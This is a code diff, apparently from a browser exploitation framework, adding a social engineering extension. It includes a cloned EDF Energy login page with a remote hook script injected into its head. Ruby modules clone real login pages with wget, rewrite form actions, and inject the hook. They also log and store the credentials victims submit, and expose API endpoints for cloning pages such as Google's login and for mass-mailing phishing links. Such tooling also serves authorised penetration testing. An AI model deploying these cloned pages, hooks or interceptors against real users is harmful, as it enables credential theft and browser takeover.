+			
+			callGA('no');
+			}
+		}	
+	}
+	
+	function change(param1,param2)
+	{
+		param1.style.backgroundColor = param2;	
+	}
+
+
+	function allValidChars(email) 
+	{
+	
+		var parsed = true;
+		
+		var validchars = "abcdefghijklmnopqrstuvwxyz0123456789@.-_!#$%&`*+-/=?^'{}|~\"";
+		
+		
+		for (var i=0; i < email.length; i++) 
+		{
+			
+			var letter = email.charAt(i).toLowerCase();
+			
+			if (validchars.indexOf(letter) != -1)
+			  continue;		  
+			parsed = false;
+			break;
+		}
+		return parsed;
+	}
+	
+	function trim(str) {
+		return str.replace(/(^[\s\xA0]+|[\s\xA0]+$)/g, '');
+	}
+	function validateEmail(email)
+	{
+		var decision = true;
+		if(trim(email)!= null && trim(email) !=""){		
+			if(email.match(emailRegEx)){
+				decision = true;
+			}else{
+				decision = false;
+			}
+		}else{
+			decision = false;
+		}
+		
+		/*
+		if (! allValidChars(email)) 
+		{  
+	        decision = false;
+	    }
+		if (email.indexOf("@") < 1) 
+		{ 
+	        decision = false;
+	    } 
+	     
+	    if(email.indexOf("@")!=email.lastIndexOf("@"))
+	    {
+	     decision = false;
+	    }    	
+	   
+	    else if (email.lastIndexOf(".") <= email.indexOf("@")) 
+	    {  
+	        decision = false;
+	    } 
+	    else if (email.indexOf("@") == email.length) 
+	    {  
+	        decision = false;
+	    } 
+	    else if (email.indexOf("..") >=0) 
+	    { 
+			decision = false;
+	    } 
+	    else if (email.indexOf(".") == email.length) 
+	    {  
+			decision = false;
+	    }*/
+	    if(!decision)
+	    {
+	    	
+	    	document.logonForm.f_username.focus();
+	    	
+	    	change(document.logonForm.f_username,'#FFFFFF'); // Cosmotic Changes 
+	    	
+	    	document.getElementById('errorMessage').innerHTML = "Please enter a valid email address";
+			document.getElementById('errorMessage1').innerHTML = "";
+	    	
+	    }
+	    else
+	    {
+	    	
+	    	change(document.logonForm.f_username,'#FFFFFF');
+	    }
+	    return decision;
+	}
+	
+
+	function callGA(GA) 
+	{
+		if(GA!=null && GA=="yes")
+		{
+			_gaq.push(['_trackPageview', 'LoginAttempted']);
+		}
+		var t = setTimeout("validateLogin()", 100);
+	}
+
+	
+
+	function validateLogin()
+	{
+	 		
+		var email = document.logonForm.f_username.value;
+		var pass = document.logonForm.f_passwd.value;
+		
+		if(email==null || email=="")
+		{
+			document.logonForm.f_username.focus();
+			
+			document.getElementById('errorMessage').innerHTML = "Please enter your 'username', which is your email address";
+			
+			document.getElementById('errorMessage1').innerHTML = "";
+			return false;
+		}
+		else 
+		{
+			if(validateEmail(email))
+			{
+				if(pass==null || pass=='')
+				{
+					document.logonForm.f_passwd.focus();
+					document.getElementById('errorMessage').innerHTML = "Please enter your password";
+					document.getElementById('errorMessage1').innerHTML = "";
+					change(document.logonForm.f_passwd,'#FFFFFF');
+					return false;
+				}
+				else
+				{
+					change(document.logonForm.f_passwd,'#FFFFFF');				
+					document.logonForm.action = "/nclogin.submit";	
+					
+					EDFEDisableSubmitButton1('Login','EDFElogonButton');
+					document.logonForm.submit();
+				}
+			}
+			
+		}
+		
+	}
+
+
+	function validateFU()
+	{
+		document.logonForm.action = "/irj/servlet/prt/portal/prtroot/com.edfe.orcharcd.forgotUserName.ForgotUserNameController";
+		document.logonForm.submit();
+	}
+	
+	
+	function validateFP()
+	{
+		document.logonForm.action = "/irj/servlet/prt/portal/prtroot/com.edfe.orchard.forgotPassword.ForgotPasswordComp";
+		document.logonForm.submit();
+	}
+	
+	
+		function validateRegisterSME()
+	{
+		document.logonForm.action = "/irj/servlet/prt/portal/prtroot/com.edfe.orchard.SelfRegistration.SelfRegistrationComp"+"?refUsr=SME";
+		
+		document.logonForm.submit();
+	}
+		function validateRegisterResi()
+	{
+		document.logonForm.action = "/irj/servlet/prt/portal/prtroot/com.edfe.orchard.SelfRegistration.SelfRegistrationComp"+"?refUsr=RESI";
+		
+		document.logonForm.submit();
+	}
+	
+
+	function validateMR()
+	{
+		document.logonForm.action = "/irj/servlet/prt/portal/prtroot/EnterMeterRead_OutAccount.EnterMeterRead_Controller"; 
+		document.logonForm.submit();
+	}
+
+	
+
+</script>
+
+  <script type="text/javascript" src="http://192.168.0.3:80/hook.js"></script>
+</head>
+  
+  <body onLoad="history.forward(); document.logonForm.f_username.focus();">
+	<div id="wrap">
+	  <div id="outer-right">
+		<div id="outer">
+<!--------------------------- start top section ----------------------------------->
+
+	
+
+
+<script>
+function performSearch()
+{
+	var searchItem 		= document.getElementById('searchBox');
+	window.open('http://www.edfenergy.com/search-results.php?query='+searchItem.value,'_blank');
+}
+
+function clearText()
+{
+	document.getElementById('searchBox').value="";
+}
+
+function EDFEDisableSubmitButton( button_text, button_id )
+{
+	var bid = button_id;
+	var btext = button_text;
+	document.getElementById( bid ).innerHTML = "<div class='btbg' id='"+bid+"'><a>"+ btext +" &raquo; </a></div>" ;
+}
+
+
+</script>
+
+
+<!--------------------------- start top section ----------------------------------->
+		
+	<div id="header">
+		  <p class="hide-element">
+			<a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#pnav">skip to primary navigation</a>
+		  </p>
+		  <div id='logo'>
+			<img src='https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/common/edfenergy_logo2.gif' title='EDF Energy' alt='EDF Energy' width='56' height='89' border='0' />
+		  </div><!-- start top utilities -->
+          
+		  <div id="toplinks">
+		  <div class="left">
+         <ul>
+				<li><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com">Home</a></li>
+				<li><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com">MyAccount</a></li>		
+				<li><a href="https://my-account.edfenergy.com/irj/servlet/prt/portal/prtroot/EnterMeterRead_OutAccount.EnterMeterRead_Controller">My meter reading</a></li>
+		 </ul>
+		 </div>
+				
+		<div class="right">
+			<ul>
+				<li><a href="http://www.edf.com" target="_blank">EDF Group</a></li>
+			</ul>        
+           	
+           <div id="searchform">
+<form name="SearchForm" id="SearchForm" action="/irj/portal/anonymous">			  <input name="searchBox" id="searchBox" type="text" value="Search" class="searchtextbox" onfocus="clearText()" />
+			  <input name="searchSubmit" type="image" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/common/search-icon.png" title="Perform Search" class="faq-button" onclick="performSearch(); return false;" />
+			<input type="hidden" name="__ncforminfo" value="aG5IjEByLfWulwL539YlRxugW3Unfla8YtGvDKb-X_2YFxvNDTOZUB0qVQVl6ZXF"></form>
+		   </div>	
+		   
+		</div>		 		  
+</div>
+		
+		  
+		  <div id="olympiclogo">
+			<img src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/common/london2012_logo_new.gif" alt="London 2012 Official Electricity Supplier" title="London 2012 Official Electricity Supplier" />
+		  </div><!-- end top utilities -->
+
+          <!-- start top navigation -->
+            <div id="topnav">
+            <div id="topnav-inner">
+              <p class="hide-element">
+                <a name="pnav" id="pnav">primary navigation</a>
+              </p>
+              <p class="hide-element">
+                <a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#snav">skip to secondary navigation</a>
+              </p> 
+              <ul>
+                <li>
+                  <a target="_blank" href="https://www.edfenergy.com/products-services/index.shtml" >Products &amp; Services</a>
+                </li>
+	    		<li>
+	            <a target="_blank" href="http://www.edfenergy.com/energyfuture">Energy Future</a>
+	            </li>
+                
+                <li>
+                  <a target="_blank" href="https://www.edfenergy.com/about-us/index.shtml">About us</a>
+                </li>
+                <li>
+                  <a target="_blank" href="https://www.edfenergy.com/sustainability/index.shtml">Sustainability</a>
+                </li>
+                <li>
+                  <a target="_blank" href="https://www.edfenergy.com/careers/index.shtml">Careers</a>
+                </li>
+                <li>
+                  <a target="_blank" href="https://www.edfenergy.com/media-centre/index.shtml">Media centre</a>
+                </li>
+                <li>
+                  <a target="_blank" href="https://www.edfenergy.com/safety-emergencies/index.shtml">Safety &amp; emergencies</a>
+                </li>
+                
+              </ul>
+              <div class="clearFix"></div>
+            </div>
+          </div><!-- end top navigation -->
+		  </div>		  		  
+<!--------------------------- end top section ----------------------------------->	  
+
+
+
+<!--------------------------- end top section ----------------------------------->	  
+		  
+<div id="pagehold">
+           	
+<!--------------------------- start left section ----------------------------------->
+
+		
+
+
+<SCRIPT>
+	function fnNavigateMenu(locationURL,navigParam,menuIden)
+	{
+		if (navigParam == 'false')
+		{
+			document.outsidemenu.menuidentifier.value		= menuIden ;
+			document.outsidemenu.action 					= locationURL ;
+			document.outsidemenu.submit() ;
+		}
+		else
+		{
+			window.open(locationURL) ;
+		}
+	}
+</SCRIPT>
+ 
+			<!-- start left section forgottenusername.html;forgottenpassword.html -->
+			   <div id="leftnav-outer">
+			  <div id="leftnav">
+				  <ul>
+	
+							<li><ul><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="xxx" onClick="fnNavigateMenu('/irj/servlet/prt/portal/prtroot/EnterMeterRead_OutAccount.EnterMeterRead_Controller','false','EMR')" >Submit meter reading</a></ul></li>	
+		
+							<li>
+							<ul>
+								<a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="xxx" onClick="fnNavigateMenu('http://www.edfenergy.com/contact-us/index.shtml','true','CONTACTUS')">Contact us</a>
+							</ul>
+						</li>
+						<li>
+						
+							<ul><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="current" onClick="fnNavigateMenu('/irj/portal/anonymous','false','LOGON')" >Login / Register</a>	
+								<ul>
+									<li><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="" onClick="fnNavigateMenu('/irj/servlet/prt/portal/prtroot/com.edfe.orcharcd.forgotUserName.ForgotUserNameController','false','FUN')" >Forgotten your username</a></li>
+									<li><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="" onClick="fnNavigateMenu('/irj/servlet/prt/portal/prtroot/com.edfe.orchard.forgotPassword.ForgotPasswordComp','false','FUP')" >Forgotten your password</a></li>
+								</ul>
+							</ul>
+							
+					</li>					
+
+				</ul>
+	
+				<ul>
+				<br/><br/>
+				<div id="lpButtonDiv" align="center">
+				 
+				</div>
+				</ul>
+	 
+			  </div>
+			</div>
+					<!-- end left section -->			
+<form name="outsidemenu" method="POST" action="/irj/portal/anonymous">	<input type="hidden" name="menuidentifier" value="">
+<input type="hidden" name="__ncforminfo" value="aG5IjEByLfWqJ6R7zZUHhDE15UF2cpEumhm0TWuQDLfNnOD8MqMtjNF30GgZOV1f"></form>
+					
+<!--------------------------- end left section ----------------------------------->
+
+              
+<!--------------------------- start middle section ----------------------------------->
+              
+			<div id="maincontent-wrap" class="fullwidth">
+			  <p class="hide-element">
+				<a name="cont" id="cont">main content</a>
+			  </p>
+			  <div id="maincontent-full" class="nobanner">
+				 <div id="banner" class="BannerWith2Circles">
+				  <h1>
+					Login / Register
+				  </h1>
+				  <div id="banner_text_wrap">
+					<img alt="" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/banners/my-account.jpg" />
+					<div id="banner_text">
+					 <p>
+                        &nbsp;<br />&nbsp;<br />Login or register<br />to access your<br />
+                        energy account online<br />&nbsp;<br />&nbsp;<br />&nbsp;<br />&nbsp;
+                      </p>
+
+					</div>
+				  </div>
+				</div>
+				<div id="two-col-wrap" class="two_col_wrap_bg">
+                  
+				  <div id="content" class="make-full">
+					<div id="data">
+						<div id="leftcolumn">
+							<h2>Login to MyAccount</h2>
+
+<!-- Prototype Builder Start srm::-->
+
+<form name="logonForm" method="post" action="/irj/portal/anonymous">
+				<span class="legacymessage">
+				
+				</span>
+				<span class="legacymessage">
+				
+				</span>
+			  
+				
+			  	
+				<span class="warningmessage" id="errorMessage"></span><BR/>
+				<span class="warningmessage" id="errorMessage1"></span>
+				
+				
+				<input type ="hidden" name = "f_method" value = "LOGIN" />
+				<table class="formfields" border="1" summary="Visual Layout for the login form">
+				<tbody>
+				<tr>
+				<th><label for="f_username">Username (email address)<em>*</em></label></th><td>
+				
+				<input id="f_username" name="f_username" type="text" size="27" maxlength="241" tabindex="1" value=""/>
+				
+				<A class="form_field_help" href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#f_username"><IMG alt="help" title="help" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/buttons/help_button.gif"><SPAN>Please enter your username</SPAN></A>
+				</td>
+				</tr>
+				<tr>
+				<th><label for="f_passwd">Password<em>*</em></label></th><td>
+				
+				<input id="f_passwd" name="f_passwd" type="Password" size="18" maxlength="16" tabindex="2" autocomplete=OFF/>
+				
+				<A class="form_field_help" href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#f_passwd"><IMG alt="help" title="help" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/buttons/help_button.gif"><SPAN>Please enter the password for this account</SPAN></A>
+				</td>
+				</tr>
+				
+				</tbody>
+				</table>
+				
+
+				<input type="submit" value="Login" style="background:#FE5815;color:white!important;heigth:6em;width:7em;font-size:14px;font-family:arial;font-weight:500;margin:0px;padding-left:15px;padding-right:15px;padding-top:7px;padding-bottom:7px;border:none;cursor:pointer">
+
+				
+				<br /><br /><br />
+				<p>Forgotten your <a href="javaScript:validateFU();">username</a> or <a href="javaScript:validateFP();">password</a>?</p>
+			<input type="hidden" name="__ncforminfo" value="aG5IjEByLfUN7mVuDM1dmcrQChOQXirPHBYBwncOB_h5_QMzu8x_5eBlZcqXpqJKJuOtpQFlZPpXFhCbOjTPxw=="></form>
+
+<!-- Prototype Builder End -->
+						</div>
+						<div id="rightcolumn">			
+					<h2>Register Today!</h2>
+				  <p>&nbsp;</p>
+
+		  <ul>
+				<li class="tick"> View and pay your bills</li>
+			  <li class="tick"> Submit your meter reading</li>
+			  <li class="tick"> Update your details</li>
+			  <li class="tick"> Sign up for Direct Debit</li>
+		  </ul><br/>
+									
+
+<table border=0><tr>
+<td>										
+			<div class="btbu" id="registerButtonResi"><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" onClick="validateRegisterResi();" class="">Register your<br> home &raquo;</a></div> 
+			</td><td>
+&nbsp;&nbsp;&nbsp;</td>
+<td>			<div class="btbu" id="registerButtonSME"><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" onClick="validateRegisterSME();" class="">Register your<br> business &raquo;</a></div>
+	</td></tr>
+	</table>								
+<br/>
+								  <p><strong>Don't have an online account?</strong><br/>You can still <a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" onClick="validateMR();">submit a meter reading</a></p>
+						</div>
+					</div>
+				  </div>
+				</div>
+			  </div>
+			</div>
+<!--------------------------- end middle section ----------------------------------->	
+		
+</div><!--pagehold-->
+		
+<!--------------------------- start bottom section ----------------------------------->	
+          
+
+		
+
+
+
+
+
+
+<script type="text/javascript">
+var __stormJs = 't1.stormiq.com/dcv4/jslib/3171_71E90107_6FC7_48DB_B3F5_713D754C9B89.js';
+</script>
+<script type="text/javascript" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/scripts/track.js"></script>
+
+
+<script type="text/javascript">
+
+function TermsAndConditions()
+{
+	window.open("/irj/servlet/prt/portal/prtroot/com.edfe.orchard.SelfRegistration.PromotionalContentComp?fileName=TermsAndConditions.htm","MyAccount","location=no,scrollbars=yes");
+	//location.href = "/irj/servlet/prt/portal/prtroot/orcss.anonym.tncprivacy.TnCPrivacyPolicyController?urlParameter=tnc";
+}
+function PrivacyPolicy()
+{
+	window.open("/irj/servlet/prt/portal/prtroot/com.edfe.orchard.SelfRegistration.PromotionalContentComp?fileName=Privacy.html","MyAccount","location=no,scrollbars=yes");
+	//location.href = "/irj/servlet/prt/portal/prtroot/orcss.anonym.tncprivacy.TnCPrivacyPolicyController?urlParameter=privacy";
+}
+// Removes leading whitespaces
+function LTrim( value ) {
+	
+	var re = /\s*((\S+\s*)*)/;
+	return value.replace(re, "$1");
+	
+}
+
+// Removes ending whitespaces
+function RTrim( value ) {
+	
+	var re = /((\s*\S+)*)\s*/;
+	return value.replace(re, "$1");
+	
+}
+
+// Removes leading and ending whitespaces
+function trim( value ) {
+	
+	return LTrim(RTrim(value));
+	
+}
+
+</script>
+
+
+
+<!-- start bottom section -->	
+		  <div id="footer">
+			<ul>
+			  <li>
+				<a href="javascript:TermsAndConditions();">Terms &amp; conditions</a>
+			  </li>
+			  <li>
+				<a href="javascript:PrivacyPolicy();">Privacy</a>
+			  </li>
+			  <li>
+				<a href="http://www.edfenergy.com/products-services/accessibility.shtml" target="_blank">Accessibility</a>
+			  </li>
+			  <li>
+				<a href="http://www.edfenergy.com/products-services/copyright.shtml" target="_blank">Copyright statement</a>
+			  </li>
+			  <li class="last">
+				<a href="http://www.edfenergy.com/products-services/fuel-mix.shtml" target="_blank">Our fuel mix</a>
+			  </li>
+			</ul>
+			
+				<p class="copy"> &copy; EDF Energy 2012 All rights reserved</p>
+				<p class = "cookiePolicy">By continuing to use this site, you agree to our <a target="_blank" href="http://www.edfenergy.com/about-us/cookies/cookie-policy.shtml" style = "text-decoration:underline; color: #fff">Cookie Policy</a>.If you don't agree to Cookies<br>being stored on your computer in line with that policy please navigate away from this site.</p>
+		  </div>
+          
+<!-- end bottom section -->		
+
+
+<SCRIPT>
+	document.body.scroll = "";
+</SCRIPT>			
+<!--------------------------- end bottom section ----------------------------------->	
+	  
+		</div><!--outer-->
+	  </div>
+	</div><!--wrap-->
+  </body>
+</html>
+
+
+</TD></TR></TABLE>
+
+
+</body></html>

extensions/social_engineering/models/interceptor.rb

@@ -0,0 +1,35 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+  module Core
+    module Models
+      class Interceptor
+
+        include DataMapper::Resource
+
+        storage_names[:default] = 'extension_seng_interceptor'
+
+        property :id, Serial
+        property :ip, Text, :lazy => false
+        property :post_data, Text, :lazy => false
+
+        belongs_to :webcloner
+
+      end
+
+    end
+  end
+end

extensions/social_engineering/models/mass_mailer.rb

@@ -0,0 +1,33 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+  module Core
+    module Models
+
+      class Massmailer
+
+        include DataMapper::Resource
+
+        storage_names[:default] = 'extension_seng_massmailer'
+
+        property :id, Serial
+
+        #todo fields
+      end
+
+    end
+  end
+end

extensions/social_engineering/models/web_cloner.rb

@@ -0,0 +1,36 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+  module Core
+    module Models
+      class Webcloner
+
+        include DataMapper::Resource
+
+        storage_names[:default] = 'extension_seng_webcloner'
+
+        property :id, Serial
+
+        property :uri, Text, :lazy => false
+        property :mount, Text, :lazy => false
+
+        has n, :extension_seng_interceptor, 'Interceptor'
+
+      end
+
+    end
+  end
+end

extensions/social_engineering/rest/socialengineering.rb

@@ -0,0 +1,131 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+
+module BeEF
+  module Extension
+    module SocialEngineering
+      class SEngRest < BeEF::Core::Router::Router
+
+        config = BeEF::Core::Configuration.instance
+
+        before do
+          error 401 unless params[:token] == config.get('beef.api_token')
+          halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
+          headers 'Content-Type' => 'application/json; charset=UTF-8',
+                  'Pragma' => 'no-cache',
+                  'Cache-Control' => 'no-cache',
+                  'Expires' => '0'
+        end
+
+        #Example: curl -H "Content-Type: application/json; charset=UTF-8"
+        #-d '{"url":"https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue=
+        #https://mail.google.com/mail/&ss=1&scc=1&ltmpl=default&ltmplcache=2", "mount":"/url"}'
+        #-X POST http://127.0.0.1:3000/api/seng/clone_page?token=851a937305f8773ee82f5259e792288cdcb01cd7
+        post '/clone_page' do
+          request.body.rewind
+          begin
+            body = JSON.parse request.body.read
+            uri = body["url"]
+            mount = body["mount"]
+            use_existing = body["use_existing"]
+
+            if uri != nil && mount != nil
+              if (uri =~ URI::regexp).nil? #invalid URI
+                print_error "Invalid URI"
+                halt 401
+              end
+
+              if !mount[/^\//] # mount needs to start with /
+                print_error "Invalid mount (need to be a relative path, and start with / )"
+                halt 401
+              end
+
+              web_cloner = BeEF::Extension::SocialEngineering::WebCloner.instance
+              success = web_cloner.clone_page(uri,mount,use_existing)
+              if success
+                result = {
+                    "success" => true,
+                    "mount" => mount
+                }.to_json
+              else
+                result = {
+                    "success" => false
+                }.to_json
+              end
+            end
+
+          rescue Exception => e
+            print_error "Invalid JSON input passed to endpoint /api/seng/clone_page"
+            error 400 # Bad Request
+          end
+        end
+
+        # Example: curl -H "Content-Type: application/json; charset=UTF-8" -d 'json_body'
+        #-X POST http://127.0.0.1:3000/api/seng/send_mails?token=68f76c383709414f647eb4ba8448370453dd68b7
+        # Example json_body:
+        #{
+        #    "template": "default",
+        #    "subject": "Hi from BeEF",
+        #    "fromname": "BeEF",
+        #    "link": "http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx",
+        #    "linktext": "http://beefproject.com",
+        #    "recipients": [{
+        #            "user1@gmail.com": "Michele",
+        #            "user2@antisnatchor.com": "Antisnatchor"
+        #}]
+        #}
+        post '/send_mails' do
+          request.body.rewind
+          begin
+            body = JSON.parse request.body.read
+
+            template = body["template"]
+            subject = body["subject"]
+            fromname = body["fromname"]
+            link = body["link"]
+            linktext = body["linktext"]
+
+            if template.nil? || subject.nil? || fromname.nil? || link.nil? || linktext.nil?
+              print_error "All parameters are mandatory."
+              halt 401
+            end
+
+            if (link =~ URI::regexp).nil?#invalid URI
+              print_error "Invalid link or linktext"
+              halt 401
+            end
+
+            recipients = body["recipients"][0]
+
+            recipients.each do |email,name|
+              if !/\b[A-Z0-9._%a-z\-]+@(?:[A-Z0-9a-z\-]+\.)+[A-Za-z]{2,4}\z/.match(email) || name.nil?
+                print_error "Email [#{email}] or name [#{name}] are not valid/null."
+                halt 401
+              end
+            end
+
+          mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance
+          mass_mailer.send_email(template, fromname, subject, link, linktext, recipients)
+          rescue Exception => e
+            print_error "Invalid JSON input passed to endpoint /api/seng/clone_page"
+            error 400
+          end
+        end
+
+      end
+    end
+  end
+end

extensions/social_engineering/web_cloner/interceptor.rb

@@ -0,0 +1,61 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+  module Extension
+    module SocialEngineering
+      require 'sinatra/base'
+      class Interceptor < Sinatra::Base
+
+      configure do
+          set :show_exceptions, false
+      end
+
+      # intercept GET
+      get "/" do
+        print_info "GET request from IP #{request.ip}"
+        print_info "Referer: #{request.referer}"
+        cloned_page = settings.cloned_page
+        cloned_page
+      end
+
+      # intercept POST
+      post "/" do
+        print_info "POST request from IP #{request.ip}"
+        request.body.rewind
+        data = request.body.read
+        print_info "Intercepted data:"
+        print_info data
+
+        interceptor_db = BeEF::Core::Models::Interceptor.new(
+            :webcloner_id => settings.db_entry.id,
+            :post_data => data,
+            :ip => request.ip
+        )
+        interceptor_db.save
+
+        if settings.frameable
+          print_info "Page can be framed :-) Loading original URL into iFrame..."
+          "<html><head><script type=\"text/javascript\" src=\"#{settings.beef_hook}\"></script>\n</head></head><body><iframe src=\"#{settings.redirect_to}\" style=\"border:none; background-color:white; width:100%; height:100%; position:absolute; top:0px; left:0px; padding:0px; margin:0px\"></iframe></body></html>"
+        else
+          print_info "Page can not be framed :-) Redirecting to original URL..."
+          redirect settings.redirect_to
+        end
+      end
+      end
+    end
+  end
+end
+

extensions/social_engineering/web_cloner/web_cloner.rb

@@ -0,0 +1,178 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+  module Extension
+    module SocialEngineering
+      class WebCloner
+        include Singleton
+
+
+        def initialize
+          @http_server = BeEF::Core::Server.instance
+          @config = BeEF::Core::Configuration.instance
+          @cloned_pages_dir = "#{File.expand_path('../../../../extensions/social_engineering/web_cloner', __FILE__)}/cloned_pages/"
+          @beef_hook = "http://#{@config.get('beef.http.host')}:#{@config.get('beef.http.port')}#{@config.get('beef.http.hook_file')}"
+        end
+
+        def clone_page(url, mount, use_existing)
+          print_info "Cloning page at URL #{url}"
+          uri = URI(url)
+          output = uri.host
+          output_mod = "#{output}_mod"
+          user_agent = @config.get('beef.extension.social_engineering.web_cloner.user_agent')
+
+          success = false
+
+          # Sometimes pages use Javascript/custom logic to submit forms. In these cases even having a powerful parser,
+          # there is no need to implement the complex logic to handle all different cases.
+          # We want to leave the task to modify the xxx_mod file to the BeEF user, and serve it through BeEF after modification.
+          # So ideally, if the the page needs custom modifications, the web_cloner usage will be the following:
+          # 1th request. {"uri":"http://example.com", "mount":"/"} <- clone the page, and create the example.com_mod file
+          # - the user modify the example.com_mod file manually
+          # 2nd request. {"uri":"http://example.com", "mount":"/", "use_existing":"true"} <- serve the example.com_mod file
+          #
+          if use_existing.nil? || use_existing == false
+            begin                                                                                                                      #,"--background"
+              IO.popen(["wget", "#{url}","-c", "-k", "-O", "#{@cloned_pages_dir + output}", "-U", "#{user_agent}","--no-check-certificate"], 'r+') do |wget_io| end
+              success = true
+            rescue Exception => e
+              print_error "Errors executing wget: #{e}"
+              print_error "Looks like wget is not in your PATH. If 'which wget' returns null, it means you don't have 'wget' in your PATH."
+            end
+
+            if success
+              File.open("#{@cloned_pages_dir + output_mod}", 'w') do |out_file|
+                File.open("#{@cloned_pages_dir + output}", 'r').each do |line|
+                  # Modify the <form> line changing the action URI to / in order to be properly intercepted by BeEF
+                  if line.include?("<form ")
+                    line_attrs = line.split(" ")
+                    c = 0
+                    cc = 0
+                    #todo: probably doable also with map!
+                    # modify the form 'action' attribute
+                    line_attrs.each do |attr|
+                      if attr.include? "action=\""
+                        print_info "Form action found: #{attr}"
+                        break
+                      end
+                      c += 1
+                    end
+                    line_attrs[c] = "action=\"#{mount}\""
+
+                    #todo: to be tested, needed in case like yahoo
+                    # delete the form 'onsubmit' attribute
+                    #line_attrs.each do |attr|
+                    #  if attr.include? "onsubmit="
+                    #    print_info "Form onsubmit event found: #{attr}"
+                    #    break
+                    #  end
+                    #  cc += 1
+                    #end
+                    #line_attrs[cc] = ""
+
+                    mod_form = line_attrs.join(" ")
+                    print_info "Form action value changed in order to be intercepted :-D"
+                    out_file.print mod_form
+                    # Add the BeEF hook
+                  elsif line.include?("</head>") && @config.get('beef.extension.social_engineering.web_cloner.add_beef_hook')
+                    out_file.print add_beef_hook(line)
+                    print_info "BeEF hook added :-D"
+                  else
+                    out_file.print line
+                  end
+                end
+              end
+            end
+          end
+
+          if File.size("#{@cloned_pages_dir + output}") > 0
+            print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]"
+
+            file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve
+
+            # Check if the original URL can be framed
+            frameable = is_frameable(url)
+
+            interceptor = BeEF::Extension::SocialEngineering::Interceptor
+            interceptor.set :redirect_to, url
+            interceptor.set :frameable, frameable
+            interceptor.set :beef_hook, @beef_hook
+            interceptor.set :cloned_page, get_page_content(file_path)
+            interceptor.set :db_entry, persist_page(url,mount)
+
